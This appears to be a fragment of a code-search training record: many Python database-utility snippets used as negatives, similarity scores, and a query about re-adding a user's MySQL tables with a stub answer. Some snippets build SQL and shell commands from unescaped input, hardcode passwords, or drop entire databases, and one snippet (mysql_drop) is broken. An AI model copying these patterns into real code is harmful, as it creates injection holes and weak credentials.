db.drop_all()\n db.create_all()\n db.session.commit()\n fakePlant = Plant(living = True)\n db.session.add(fakePlant)\n db.session.commit()\n db.session.delete(fakePlant)\n db.session.execute('SET FOREIGN_KEY_CHECKS=1;')\n db.session.commit()", "def pg_drop(ctx):\n ctx.obj = ConfigDBConnector()\n ctx.obj.connect()", "def migrate_database(self):\n\n self.db.migrate_database()", "def drop_database():\n drop_db(app)", "def remove():\n\n db_remove()", "def restart_db():\n print system(\"service postgresql restart \")\n time.sleep(POSTGRES_WAIT)", "def db_create():\n db.drop_all()\n db.create_all()\n db.session.commit()", "def db(app, request):\n with app.app_context():\n _db.drop_all()\n _db.create_all()", "def upgrade_environment(self, db):\n if db is not None:\n db.commit()\n self.create_db()", "def reset_database(self):\n\n self.db.reset_database()", "def restore_database(app):\n app.database().restore()\n app.refresh()", "def initDB(host, port, user, dbName):\n # Replace the old database and create a new one\n print \"Kill existing session...\"\n with open('sql/killsession.sql') as fin:\n sql = fin.read() % dbName\n cmdStr = \"psql -h %s -p %s -U %s -c \\\"%s\\\"\" \\\n % (host, port, user, sql)\n os.popen(cmdStr)\n\n print \"Initialize point cloud database...\"\n cmdStr = \"psql -h %s -p %s -U %s -c \\\"DROP DATABASE IF EXISTS %s;\\\"\" \\\n % (host, port, user, dbName)\n os.popen(cmdStr)\n\n cmdStr = \"psql -h %s -p %s -U %s -c \\\"CREATE DATABASE %s;\\\"\" \\\n % (host, port, user, dbName)\n os.popen(cmdStr)\n\n cmdStr = \"psql -h %s -p %s -U %s -d %s -f sql/dbinit.sql\" \\\n % (host, port, user, dbName)\n os.popen(cmdStr)", "def reset_db():\n db.drop_all()\n _init_db()", "def _init_db():\n c = ppc.app().config['PUBLICPRIZE']['DATABASE']\n e = os.environ.copy()\n e['PGPASSWORD'] = c['postgres_pass']\n subprocess.call(\n ['createuser', '--host=' + c['host'], '--user=postgres',\n '--no-superuser', '--no-createdb', '--no-createrole', c['user']],\n env=e)\n p = subprocess.Popen(\n ['psql', '--host=' + c['host'], '--user=postgres', 'template1'],\n env=e,\n stdin=subprocess.PIPE)\n s = u\"ALTER USER {user} WITH PASSWORD '{password}'\".format(**c)\n enc = locale.getlocale()[1]\n loc = locale.setlocale(locale.LC_ALL)\n p.communicate(input=bytes(s, enc))\n subprocess.check_call(\n ['createdb', '--host=' + c['host'], '--encoding=' + enc,\n '--locale=' + loc, '--user=postgres',\n '--template=template0',\n '--owner=' + c['user'], c['name']],\n env=e)", "def reset_dbs():\n db.answering_users.remove({})\n db.answered_users.remove({})", "def postgresql():\n icanhaz.postgres.server()\n\n icanhaz.postgres.user('pguser', 'foo')\n assert fabtools.postgres.user_exists('pguser')\n\n icanhaz.postgres.database('pgdb', 'pguser')\n assert fabtools.postgres.database_exists('pgdb')", "def create_db(db, db_username):\n print system(\"su -c \\\"echo \\\\\\\"create database \" + db + \" with owner \" + db_username + \";\\\\\\\" | psql \\\" postgres\")", "def drop_user(self):\n try:\n with self.connect_db:\n request = \"\"\"DROP TABLE IF EXISTS user\"\"\"\n self.connect_db.execute(request)\n self.connect_db.commit()\n\n except Exception:\n super_logger.error('Error drop_user', exc_info=True)", "def reset_db(name, fail_ok=True):\n print(\"Deleting\", db_path(name))\n close_old_connections()\n delete_failed = False\n if os.path.exists(db_path(name)): # your database is corrupted and must be destroyed\n connections[name].close()\n try:\n # or you could http://stackoverflow.com/a/24501130/2291495\n os.remove(db_path(name))\n except PermissionError as err: # must still be holding onto the file lock, clear out contents instead\n if not fail_ok:\n raise err\n else: # I already tried manage.py flush. It doesn't do enough\n execute = connections[name].cursor().execute\n # raw_sql = \"select 'drop table ' || name || ';' from sqlite_master where type = 'table';\"\n execute(\"PRAGMA writable_schema = 1;\")\n execute(\"delete from sqlite_master where type in ('table', 'index', 'trigger');\")\n execute(\"PRAGMA writable_schema = 0;\")\n execute(\"VACUUM;\")\n execute(\"PRAGMA INTEGRITY_CHECK;\")\n print(\"===Dropping all Tables===\")\n else:\n print(db_path(name), \"does not exist\")\n #creates a new blank file by migrate\n call_command('migrate', database=name, interactive=False, fake_initial=True)\n if name == 'default': # create super user\n create_super_user()", "def createDb():\n db.drop_all()\n db.create_all()", "def drop_database(self):\n self.connection.drop_database(self.database)\n self.database = self.connection[self._database_name]", "def init_db_command():\n upgrade()\n from .model import User, db\n u = User.query.filter_by(email='demos@gammalab.us').first()\n if not u:\n u = User(email='demos@gammalab.us', password='test')\n db.session.add(u)\n db.session.commit()\n click.echo('Add new user(email: demos@gammalab.us password: test)')\n click.echo('Initialized the database.')", "def drop_db():\n database.db.reflect()\n database.db.drop_all()\n print('Dropped the database')", "def delete_db():\n db.drop_all()", "def removedb(dbname):\n os.system(\"dropdb %s\" % dbname)", "def reset_db():\n from alembic.command import downgrade, upgrade\n from alembic.config import Config as AlembicConfig\n config = AlembicConfig('alembic.ini')\n downgrade(config, 'base')\n upgrade(config, 'head')\n print('Database has been reset')", "def _add_mysql(user, options, dump = None):\n # Access the new username with user[\"username\"]\n pass", "def AddDatabase(parser, help_text, required=False):\n parser.add_argument('--database', '-d', required=required, help=help_text)", "def recreate_db():\n\n print(\"will reinit db - FAKE\")\n db.create_tables([Message, Instance])\n\n # no need to prepare a sample record.\n # use http to create init request instead.\n #inject_record()", "def db():\n the_db.session.close()\n the_db.drop_all()\n the_db.create_all()\n return the_db", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def drop_db():\n db.drop_all()", "def delete_database(self, db_name):\n seqids = self.read_sequence_ids()\n if seqids.has_key(db_name):\n del seqids[db_name]\n self.write_sequence_ids(seqids)\n self._announce_updates({'type' : 'deleted_db', 'data' : db_name})", "def dropdb():\n db.drop_all()", "def change_db_user_password(self, username, password):\n\n self.sql(\"ALTER USER %s WITH PASSWORD '%s'\" % (username, password))", "def recreate_db(self, run=False):\n if run:\n db_schema = open(self.db_schema_file).read().splitlines()\n for s in db_schema:\n t = s.strip()\n if len(t):\n self.cur.execute(t)", "def set_db_user_access(db_username):\n #update pg_hba conf file with user entry will only ever be for local host\n print \"Configuring postgres access for \\\"\" + db_username + \"\\\" \"\n try:\n pg_hba = codecs.open(r\"/var/lib/pgsql/data/pg_hba.conf\", encoding=\"utf-8\", mode=\"r+\")\n except IOError:\n system(\"service postgresql initdb\")\n pg_hba = codecs.open(r\"/var/lib/pgsql/data/pg_hba.conf\", encoding=\"utf-8\", mode=\"r+\")\n\n pg_hba_text = pg_hba.read()\n pg_hba.seek(0)\n pg_hba.write(\"host all \" + db_username + \" 127.0.0.1/32 md5 #IATINSERT\\n\" + pg_hba_text)\n pg_hba.close()\n\n restart_db()", "def db_drop_and_create_all():\n db.drop_all()\n db.create_all()", "def drop_db():\n if prompt_bool(\"Are you sure you want to lose all your data?\"):\n app = create_app(dotenv.get('FLASK_CONFIG'))\n with app.app_context():\n db.drop_all()", "def add_user(db_file, user_uri, user_name):\n\n conn = create_db_connection(db_file)\n cur = conn.cursor()\n\n # Add new user to user table\n new_user = (user_uri, user_name)\n sql_add_new_user = \"\"\" INSERT INTO users(user_uri, user_name)\n VALUES(?,?) \"\"\"\n\n try:\n cur.execute(sql_add_new_user, new_user)\n except Exception as e:\n print(\"Failed adding entry to table users: \" + str(e))\n \n\n conn.commit()\n cur.close()", "def migrate_database():\n log('Migrating the keystone database.', level=INFO)\n service_stop(keystone_service())\n # NOTE(jamespage) > icehouse creates a log file as root so use\n # sudo to execute as keystone otherwise keystone won't start\n # afterwards.\n cmd = ['sudo', '-u', 'keystone', 'keystone-manage', 'db_sync']\n subprocess.check_output(cmd)\n service_start(keystone_service())\n time.sleep(10)\n peer_store('db-initialised', 'True')", "def close_db(error):\n if hasattr(g, 'postgresdb'):\n g.postgresdb.close()", "def close_db(error):\n if hasattr(g, 'postgres_db'):\n g.postgres_db.close()", "def create_db():\n init_postgres(current_app.config['SQLALCHEMY_DATABASE_URI'])", "def create_user_database(username):\n with _superuser_connection() as conn:\n res = conn.create_user_database(username=username)\n return res", "def create_db():\n\n require('environment', provided_by=env.environments)\n sudo('createdb -O %(database_user)s -T %(template_db)s %(database_name)s' % env, user='postgres')", "def seed_db():\n db.session.add(User(username='Joe', email='shmoe@test.com'))\n db.session.add(User(username='Joe2', email='joe@test.com'))\n db.session.commit()", "def delete():\n\n from slicr.extensions import db\n\n click.echo('deleting database...')\n\n db.drop_all()", "def test_add_user_to_db():\n path_users = PATH_TEST / \"users.txt\"\n\n try:\n db = get_database()\n add_users_to_db(db, path_users)\n finally:\n db.drop_collection(USERS_COLLECTION)", "def postgres(self, command):\n show = not command.startswith(\"psql\")\n return self.run_command(\n \"sudo -u root sudo -u postgres %s\" % command, show=show)", "def init_db():\n current_app.logger.info('Creating database...')\n db.drop_all()\n db.create_all()\n db.session.commit()", "def add_db(self):\n name_db = self.name_db.get()\n if len(name_db) > 0:\n self.sql_database.db_name = name_db\n if self.sql_database.create_database():\n msg.showinfo(\n message=\"\".join(\n [str(self.name_db.get()), \" created as text_reader_\", str(self.sql_database.db_name)]))\n self.name_db.delete(0, tk.END)\n self.show_db_combobox()\n else:\n msg.showinfo(message=\"Failed\")\n else:\n msg.showinfo(message=\"Write db name!\")", "def reload_db(self):\n if not settings.DATABASE_ENGINE in ['sqlite3', 'postgresql_psycopg2']:\n return None\n # Close connection to cleanly swap databases.\n connection.close()\n if settings.DATABASE_ENGINE == 'sqlite3':\n shutil.copyfile(self.db_backup_path, self.db_path)\n if settings.DATABASE_ENGINE == 'postgresql_psycopg2':\n # Establish a temporal connection to template1 database and\n # recreate TEST_DB_NAME.\n connection.settings_dict[\"DATABASE_NAME\"] = 'template1'\n cursor = connection.cursor()\n connection.creation.set_autocommit()\n cursor.execute(\"DROP DATABASE IF EXISTS %s\" % self.db_name)\n cursor.execute(\"CREATE DATABASE %s WITH TEMPLATE %s_backup\" % (\n self.db_name, self.db_name))\n connection.close()\n # Change the connection to the new test database.\n settings.DATABASE_NAME = self.db_name\n connection.settings_dict[\"DATABASE_NAME\"] = self.db_name\n # Get a cursor (even though we don't need one yet). This has\n # the side effect of initializing the test database.\n connection.cursor()\n return True", "def create_database(port, db_name, db_user, db_password):\n # Check the server version and status:\n can_migrate = check_postgres_server(port)\n print(\"Erzeuge Datenbank und Datenbankbenutzer...\", end=\"\", flush=True)\n # Need to start the service first, if postgres was only just installed.\n _run('sudo service postgresql start', capture_output=True)\n # Create the user and the database:\n _run(\n 'sudo -u postgres psql -c '\n f'\"CREATE USER {db_user} CREATEDB ENCRYPTED PASSWORD {db_password};\"',\n capture_output=True, raise_on_error=False\n )\n created_db = _run(\n f\"sudo -u postgres createdb {db_name} --owner={db_user}\",\n capture_output=True, raise_on_error=False\n )\n\n if not created_db.returncode:\n print(\"OK.\")\n else:\n print(\"Fehlgeschlagen.\")\n return can_migrate and not created_db.returncode", "def drop(name):\n\t\treturn \"DROP DATABASE {0};\".format(name)", "def delete_database(conn, schema=None):\n\n conn.set_session(autocommit=True)\n cur = conn.cursor()\n if schema is None:\n schema = 'leadmachine'\n\n # delete lead machine database with UTF8 encoding\n cur.execute(f\"DROP DATABASE IF EXISTS {schema}\")\n cur.close()\n conn.commit()", "def delete_sql_user(user, server, database):\n betterprint(\"Deleting {} from server {} and db {}\".format(user, server, database))\n\n sql = \"DROP USER [{}]\".format(user)\n\n try:\n betterprint(\"SQL: \" + sql)\n rows, userdata = execute_sql(sql, server, database)\n betterprint(\"USER removal successful.\")\n return True\n except Exception as e:\n print (e)\n return False", "def add_user_to_g():\n \n if CURRENT_USER in session:\n g.user = User.query.get(session[CURRENT_USER])\n\n else:\n g.user = None", "def __addNewAdminDB(self,admin_id,username,password,name,comment,creator_id):\n query = self.__addNewAdminQuery(admin_id,username,password,name,comment,creator_id)\n query += self.__addNewAdminIASQuery(username, creator_id)\n db_main.getHandle().transactionQuery(query)", "def pg_reset(pg):\n pg.reset_hba()\n os.truncate(pg.pgdata / \"postgresql.auto.conf\", 0)\n\n # If a previous test restarted postgres, it was probably because of some\n # config that could only be changed across restarts. To reset those, we'll\n # have to restart it again. In other cases a reload should be enough to\n # reset the configuration.\n if pg.restarted:\n pg.restart()\n pg.restarted = False\n else:\n pg.reload()\n\n yield", "def update_dev_db():\n with cd(\"/tmp\"), lcd(\"/tmp\"):\n sudo(\"pg_dump gsi > /tmp/latest.sql\", user=\"postgres\")\n run(\"tar zcvf latest.sql.tgz latest.sql\")\n get(\"/tmp/latest.sql.tgz\", \"latest.sql.tgz\")\n sudo(\"rm /tmp/latest.sql.tgz /tmp/latest.sql\")\n\n local(\"dropdb gsi\")\n local(\"createdb gsi\")\n local(\"tar zxvf latest.sql.tgz\")\n local(\"psql gsi < latest.sql\")\n local(\"rm latest.sql latest.sql.tgz\")", "def add_users():\n try:\n User.objects.get(username='admin').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_superuser(username='admin', password='admin', email='')\n print('> Superuser was created')\n\n try:\n User.objects.get(username='user1').delete()\n except User.DoesNotExist:\n pass\n User.objects.create_user(username='user1', password='user1', email='')\n print('> User (user1) was created')", "def add_user_to_db(new_profile):\n try:\n params = (new_profile.client_nickname,\n new_profile.client_username,\n new_profile.client_hostname,\n new_profile.client_port)\n client_db.execute(\"INSERT INTO clients VALUES (?, ?, ?, ?)\", params)\n client_detail_list.commit()\n client_detail_list.close()\n except:\n print('User already exists, try deleting the profile first.')", "def create_db_user():\n\n require('environment', provided_by=env.environments)\n _load_passwords(['database_password'], generate=True)\n postgres.create_db_user(env.database_user, password=env.database_password)", "def drop_db(self):\n db_name = self.db.db_url.split('///')[1]\n if os.path.exists(db_name):\n os.remove(db_name)", "def create_dbuser(default_db_name, superuser_name, superuser_password, db_host, db_port, poi_user_name, poi_user_password):\n try:\n logging.info(\"Connecting to database postgres as user postgres at host %s port %s\", db_host, db_port)\n connection = psycopg2.connect(dbname=default_db_name, user=superuser_name, host=db_host, password=superuser_password, port=db_port)\n\n connection.autocommit=True\n cursor = connection.cursor()\n\n logging.info(\"Creating role %s\", poi_user_name)\n query = '''CREATE ROLE %s WITH \n NOSUPERUSER\n NOCREATEDB\n NOCREATEROLE\n NOINHERIT\n LOGIN\n CONNECTION LIMIT -1\n ENCRYPTED PASSWORD %s'''\n params = (AsIs(poi_user_name), poi_user_password)\n cursor.execute(query, params)\n\n logging.info(\"Successfully created user %s\", poi_user_name)\n except psycopg2.ProgrammingError as e:\n if e.pgcode == '42710': #duplicate_object error code\n logging.warning(\"Role %s already exists. Make sure it has the necessary privileges or delete it and run the setup script again\", poi_user_name)\n else:\n raise Exception(\"Exception creating user\" + poi_user_name + \": \" + str(e))\n except Exception as e:\n raise Exception(\"Exception creating user:\" + str(e))", "def db(app):\n _db.drop_all()\n _db.create_all()\n\n # Create a single user because a lot of tests do not mutate this user.\n # It will result in quite a bit faster tests.\n params = {\n 'role': 'admin',\n 'email': 'admin@localhost.com',\n 'name': 'Dev',\n 'password': 'password'\n }\n\n admin = User(**params)\n\n _db.session.add(admin)\n _db.session.commit()\n\n return _db", "def mysql_drop(name=None, user=None, db_password=None):\n name = check(name, 'name: the database name to delete.')\n user = check(user, 'user: the user to remove.')\n password = check(password, 'password: user\\'s password')\n host = check(host, 'host: machine ', default='localhost')\n db_password = check(db_password, 'db_password: mysql password.')\n port == ':'+port if port is not '' else ''\n\n mysql_run((\n \"DROP DATABASE IF EXISTS {name}\",\n \"DROP USER {user}\",\n ), {'name': name, 'user': user, 'password': password, 'host': host,\n 'port': port}, db_password=db_password)", "def newDb(options, dbName, adminPswd, userPswd, viewerPswd):\n if not re.match(\"^[A-Za-z][A-Za-z0-9_]*$\", dbName):\n errorPrint(\"'%s' is not a valid database name\" % dbName)\n return\n\n adminName = dbName + \"_admin\"\n userName = dbName + \"_user\"\n viewerName = dbName + \"_viewer\"\n\n setupDictionaryDatabases(options, {\n 'databases': {\n dbName: {\n 'ownerRole': adminName,\n 'roles': {\n adminName: {\n 'password': adminPswd,\n 'role': 'admin'\n },\n userName: {\n 'password': userPswd,\n 'role': 'writer'\n },\n viewerName: {\n 'password': viewerPswd,\n 'role': 'reader'\n }\n }\n }\n }\n })", "def initDb():\n createDb()\n admin = User(\n name=\"faby\",\n lastname=\"star\",\n username=\"faby\",\n email=\"star._faby@hotmail.com\",\n isAdmin=True,\n cellphone=\"0983856136\",\n )\n admin.onSetPassord(\"faby123\")\n db.session.add(admin)\n db.session.commit()", "def createdb():\n db.create_all()", "def add_admin(self, username, password):\n password_hash = generate_password_hash(password) # Generates a SHA256 hash.\n try:\n self.cur.execute(\"INSERT INTO admins VALUES(\\\"{}\\\", \\\"{}\\\")\".format(username, password_hash))\n self.db.commit()\n except:\n self.db.rollback()", "def create_database():\n create_db(app)" ]
[ "0.7393419", "0.6982639", "0.6812037", "0.642954", "0.6232582", "0.62139505", "0.6179955", "0.5981221", "0.5960473", "0.5953316", "0.5928391", "0.59170234", "0.58603674", "0.58522147", "0.5849216", "0.5843206", "0.5840966", "0.5813732", "0.5810215", "0.58094305", "0.580628", "0.5798358", "0.5770416", "0.57682955", "0.5758723", "0.5741439", "0.5728568", "0.56953126", "0.5677446", "0.5663077", "0.56555533", "0.56550294", "0.564832", "0.56460047", "0.56258255", "0.56182843", "0.56138176", "0.55702883", "0.5566489", "0.55630934", "0.55548674", "0.55441654", "0.5521494", "0.5499801", "0.5496105", "0.54944515", "0.5485753", "0.54776895", "0.54705936", "0.54645675", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5458608", "0.5454708", "0.5449918", "0.543663", "0.5432458", "0.5423032", "0.5420444", "0.5410179", "0.54087853", "0.54059964", "0.5401194", "0.54009366", "0.5397867", "0.5393344", "0.5387145", "0.53680897", "0.5367662", "0.5367367", "0.5357914", "0.535699", "0.53567344", "0.53534436", "0.5326575", "0.5324594", "0.53214216", "0.5313185", "0.53081816", "0.5306149", "0.5292916", "0.52902365", "0.52876484", "0.52862394", "0.5279691", "0.5274808", "0.52739453", "0.5273722", "0.5271635", "0.5269341", "0.5263631", "0.5261441", "0.52569324", "0.52321595" ]
0.60755813
7
Adds a user's mysql tables back into the OCF database.
def _add_mysql(user, options, dump = None): # Access the new username with user["username"] pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def insert_db():\n populate_tables()", "def create_tables_and_apply_patches(self):\n\n if self.authorized and not self.db_tables_initiated:\n with self.connection.cursor() as cursor:\n for statement in self.parse_mysql_sql_file():\n cursor.execute(statement)\n\n PyFunceble.LOGGER.info(\n \"Created the missing tables. Applied all patched\"\n )\n\n self.db_tables_initiated = True", "def drop_tables(self):\n con = self.connect()\n cursor = con.cursor()\n cursor.execute(\"\"\"DROP TABLE IF EXISTS users CASCADE\"\"\")\n cursor.close()\n con.commit()\n con.close()", "def set_up_db():\n DATABASE.drop_tables([Customer])\n DATABASE.close()\n DATABASE.create_tables([Customer])\n DATABASE.close()", "def populate_db():\n try:\n users = [\n User(name=u'admin', role=1),\n ]\n db.session.add_all(users)\n db.session.commit()\n except:\n db.session.rollback()\n raise Exception(\"Failed to populate the database\")\n finally:\n db.session.close()", "def append_table(self, table):\n\n self._db_manager.register_table(table)", "def drop_tables():\n drop_table(ShoppingList)\n drop_table(User)\n drop_table(Category)", "def initialize():\n DATABASE.connect()\n DATABASE.create_tables([User, Entry], safe=True)\n DATABASE.close()", "def add_user(uid):\n if \"drop tables\" in uid:\n raise DropTablesError(\"Drop Tables command detected in input commands - Print Error Message\")\n DB_NAME = 'cloud_storage.db'\n DB_DIRECTORY = 'server_side_storage/'\n db = sqlite3.connect('{}{}'.format(DB_DIRECTORY, DB_NAME))\n user_table_name = uid #This might be changed later\n cursor = db.cursor()\n cursor.execute(\"INSERT INTO user_ids VALUES (NULL, ?,?)\",(uid, user_table_name))\n variable_table_command = '''CREATE TABLE {} (row_id INTEGER PRIMARY KEY AUTOINCREMENT, song_notes TEXT, author_name TEXT, creation_date TEXT, project_name TEXT)'''.format(user_table_name)\n cursor.execute(variable_table_command)\n db.commit()\n cursor.close()\n db.close()", "def unlockTables(self):\n if self.dbType=='mysql':\n query = \"UNLOCK TABLES\" \n\t self.updateDBAndLog(query)\n\telif self.dbType=='sqlite':\n\t self.db.commit()", "def create_tables():\n db.create_all()", "def create_tables():\n db.create_all()", "def initialize():\n DATABASE.connect()\n DATABASE.create_tables([User], safe=True)\n DATABASE.close()", "def upgrade():\r\n current_context = op.get_context()\r\n meta = current_context.opts['target_metadata']\r\n user = sa.Table('users', meta, autoload=True)\r\n\r\n # Add the initial admin user account.\r\n op.bulk_insert(user, [{\r\n 'username': u'admin',\r\n 'password': u'$2a$10$LoSEVbN6833RtwbGQlMhJOROgkjHNH4gjmzkLrIxOX1xLXNvaKFyW',\r\n 'email': u'testing@dummy.com',\r\n 'activated': True,\r\n 'is_admin': True,\r\n 'api_key': u'123456',\r\n }\r\n ])", "def create_db_tables():\n\n try:\n webapp.dbsql.create_all()\n webapp.dbsql.session.commit()\n except Exception as e:\n # TODO: melhorar o informe do erro\n raise e", "def create_tables():\n db.create_all()", "def create_users_tables(cls):\n cursor = Database.connect_to_db()\n sql_command = \"\"\"CREATE TABLE IF NOT EXISTS \"public\".\"users\" (\n id SERIAL ,\n firstname VARCHAR(255) NOT NULL,\n lastname VARCHAR(255) NOT NULL,\n othername VARCHAR(255) NOT NULL,\n email VARCHAR(255) NOT NULL,\n phonenumber VARCHAR(255) NOT NULL,\n passporturl TEXT NOT NULL,\n roles VARCHAR(255) NOT NULL,\n nationalid VARCHAR(255) NOT NULL,\n county VARCHAR(255) NOT NULL,\n password VARCHAR(255) NOT NULL,\n date_created VARCHAR(80),\n date_modified VARCHAR(80),\n PRIMARY KEY (id)\n )\n \"\"\"\n cursor.execute(sql_command)", "def init_tables(self):\n\n settings.Base.metadata.tables[\n 'session_master'].drop(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].drop(bind=settings.engine)\n\n settings.Base.metadata.tables[\n 'session_master'].create(bind=settings.engine)\n settings.Base.metadata.tables['uurl'].create(bind=settings.engine)\n\n logging.info(\"Sessionization Tables created\")", "def populate_table(\n user, created_at, tweet, retweet_count, id_str, my_database=DATABASE):\n\n dbconnect = connect_db(DATABASE)\n\n cursor = dbconnect.cursor()\n cursor.execute(\"USE airflowdb\")\n\n # add content here\n\n try:\n query=\"INSERT INTO tweets (user, created_at, tweet, retweet_count, id_str) VALUES (%s, %s, %s, %s, %s)\"\n \n cursor.execute(query, (user, created_at, tweet, retweet_count, id_str))\n \n dbconnect.commit()\n print(\"commited\")\n\n except mysql.Error as e:\n print(e)\n dbconnect.rollback()\n\n cursor.close()\n dbconnect.close()\n\n return", "def init():\n database.create_tables([Tracker])\n database.commit()", "def sync_tables():\n sync_table(ShoppingList)\n sync_table(User)\n sync_table(Category)\n sync_table(Feed)\n sync_table(News)\n sync_table(Photo)\n sync_table(Profile)\n sync_table(Video)\n sync_type(FeedPhoto)\n sync_type(NewsPhoto)", "def init_db():\n # users table\n cur.execute(\n \"CREATE TABLE IF NOT EXISTS users (\"\n \"id INTEGER PRIMARY KEY AUTO_INCREMENT,\"\n \"name VARCHAR(255) NOT NULL,\"\n \"email VARCHAR(255) NOT NULL,\"\n \"password VARCHAR(30) NOT NULL,\"\n \"birthdate DATE);\"\n )\n\n # users' phone records table\n cur.execute(\"CREATE TABLE IF NOT EXISTS records (\"\n \"id INTEGER PRIMARY KEY AUTO_INCREMENT,\"\n \"ownerID INTEGER,\"\n \"name VARCHAR(255),\"\n \"phone VARCHAR(22),\"\n \"birthdate DATE);\")", "def init_db():\n db = get_db()\n Page.create_table(db)\n PageVersion.create_table(db)\n User.create_table(db)", "def drop_user(self):\n try:\n with self.connect_db:\n request = \"\"\"DROP TABLE IF EXISTS user\"\"\"\n self.connect_db.execute(request)\n self.connect_db.commit()\n\n except Exception:\n super_logger.error('Error drop_user', exc_info=True)", "def clear_user_table(self,connection):\n sql=\"\"\"DROP TABLE IF EXISTS users CASCADE\"\"\"\n cursor = connection.cursor()\n cursor.execute(sql)", "def migrateTables(self):\n tables = self.client_from.tables.list(['columns'])\n if len(tables) > 0:\n for table in tables:\n self.client_to.tables.update(table['tableId'], json.dumps(table))\n else:\n print(\"No tables to migrate!\")\n return\n print(len(tables) + \" Tables migrated!\")", "def createTables():\n conn = getConnection()\n try:\n cur = conn.cursor()\n for table, query in tables.items():\n cur.execute(query)\n conn.commit()\n except Exception as ex:\n print(\"Failed to create tables:\" )\n print(ex)\n sys.exit(1)", "def _create_schema(self): \n q = (\"CREATE TABLE IF NOT EXISTS \" + \\\n \"profiles (username text, body text, epoch numeric)\",)\n for x in q: self.cursor.execute(x)\n self.conn.commit()", "def drop_database_tables(cls):\n cursor = Database.connect_to_db()\n # drop users table\n sql_command = \"\"\" DROP TABLE IF EXISTS users CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop parties table\n sql_command = \"\"\" DROP TABLE IF EXISTS parties CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop offices table\n sql_command = \"\"\" DROP TABLE IF EXISTS offices CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop candidates table\n sql_command = \"\"\" DROP TABLE IF EXISTS candidates CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop votes table\n sql_command = \"\"\" DROP TABLE IF EXISTS votes CASCADE;\n \"\"\"\n cursor.execute(sql_command)\n # drop applications table\n sql_command = \"\"\" DROP TABLE IF EXISTS applications CASCADE;\n \"\"\"\n cursor.execute(sql_command)", "def insert_default_users():\n user1 = User(email=current_app.config['ADMIN_EMAIL'],\n password=current_app.config['ADMIN_PW'],\n first_name=current_app.config['ADMIN_FIRST_NAME'],\n last_name=current_app.config['ADMIN_LAST_NAME'],\n confirmed=True)\n user1.role = Role.query.filter_by(name='Administrator').first()\n db.session.add(user1)\n\n user2 = User(email=current_app.config['USERMANAGER_EMAIL'],\n password=current_app.config['USERMANAGER_PW'],\n first_name=current_app.config['USERMANAGER_FIRST_NAME'],\n last_name=current_app.config['USERMANAGER_LAST_NAME'],\n confirmed=True)\n user2.role = Role.query.filter_by(name='Usermanager').first()\n db.session.add(user2)\n\n user3 = User(email=current_app.config['USER_EMAIL'],\n password=current_app.config['USER_PW'],\n first_name=current_app.config['USER_FIRST_NAME'],\n last_name=current_app.config['USER_LAST_NAME'],\n confirmed=True)\n user3.role = Role.query.filter_by(name='User').first()\n db.session.add(user3)\n\n db.session.commit()", "def make_new_tbl(self):\n debug = False\n default_dd = getdata.get_default_db_dets()\n con, cur = default_dd.con, default_dd.cur\n oth_name_types = getdata.get_oth_name_types(self.settings_data)\n tblname = self.tblname_lst[0]\n if debug: print(f'DBE in make_new_tbl is: {default_dd.dbe}')\n getdata.make_sofa_tbl(\n con, cur, tblname, oth_name_types, headless=False)\n wx.MessageBox(\n _('Your new table has been added to the default SOFA database'))", "def create_tables(self):\n con = self.connect()\n cursor = con.cursor()\n queries = self.tables()\n for query in queries:\n cursor.execute(query)\n cursor.close()\n con.commit()\n con.close()", "def do_createuser(self, *args):\n self.connection_obj.initialize_table()\n print(\"UserTable Created Successful\")", "def add_to_db(table, user_list):\n\n client, db = open_db_connection()\n db[table].remove()\n for user in user_list:\n db[table].insert({\"net_id\": user.replace(\"\\r\\n\", \"\").encode(\"utf-8\")})\n close_db_connection(client)", "def db_override_user_data(self):\n util.log(\"Clearing old user data\", util.LogLevel.Info)\n self.db.db_clear_data_user()\n util.log(\"Attempt loading user data to database\", util.LogLevel.Info)\n start = time.time()\n # Library\n for card in self.library.values():\n self.db.lib_card_add(card)\n # Tags\n for tag, card_ids in self.tags.items():\n self.db.tag_new(tag)\n for card_id in card_ids:\n self.db.tag_card_add(tag, card_id)\n # Wants\n for list_name, cards in self.wants.items():\n self.db.wants_new(list_name)\n for card in cards:\n self.db.wants_card_add(list_name, card.multiverse_id)\n end = time.time()\n util.log(\"Finished in {}s\".format(str(round(end - start, 3))), util.LogLevel.Info)\n self.push_status(\"User data imported\")", "def create_all_tables():\n\tcommon_db.create_all_tables()", "def create_all_tables(self):\n pass", "def _init_db(self):\n cursor = self._main_connection.cursor()\n cursor.execute(self.sql[\"create_table\"])\n self._main_connection.commit()", "def populate_db():\n\n populate_table(db, models.Department, departments_data)\n populate_table(db, models.Employee, employees_data)", "async def create_sys_tables(self) -> None:\n await self.conn.execute(\"\"\"CREATE TABLE IF NOT EXISTS tinymud_migrations (\n table_name TEXT,\n level INTEGER\n )\"\"\")", "def upgrade():\n with op.batch_alter_table(\"users\") as batch_op:\n batch_op.drop_column(\"registered_date\")\n batch_op.drop_column(\"registered_age\")\n batch_op.drop_column(\"cell\")\n batch_op.drop_column(\"portrait_id\")\n batch_op.drop_column(\"street_number\")\n batch_op.drop_column(\"id_value\")\n batch_op.drop_column(\"nat\")\n batch_op.drop_column(\"id_name\")\n batch_op.drop_column(\"md5\")\n batch_op.drop_column(\"date_of_birth\")\n batch_op.drop_column(\"sha256\")\n batch_op.drop_column(\"username\")\n batch_op.drop_column(\"salt\")\n batch_op.drop_column(\"timezone_offset\")\n batch_op.drop_column(\"uuid\")\n batch_op.drop_column(\"title\")\n batch_op.drop_column(\"age\")\n batch_op.drop_column(\"longitude\")\n batch_op.drop_column(\"sha1\")\n batch_op.drop_column(\"timezone_description\")\n batch_op.drop_column(\"password\")\n batch_op.drop_column(\"latitude\")", "def _create_table_user(cur) -> None:\n cur.execute('''\n CREATE TABLE IF NOT EXISTS user\n (id INTEGER PRIMARY KEY, name TEXT)\n 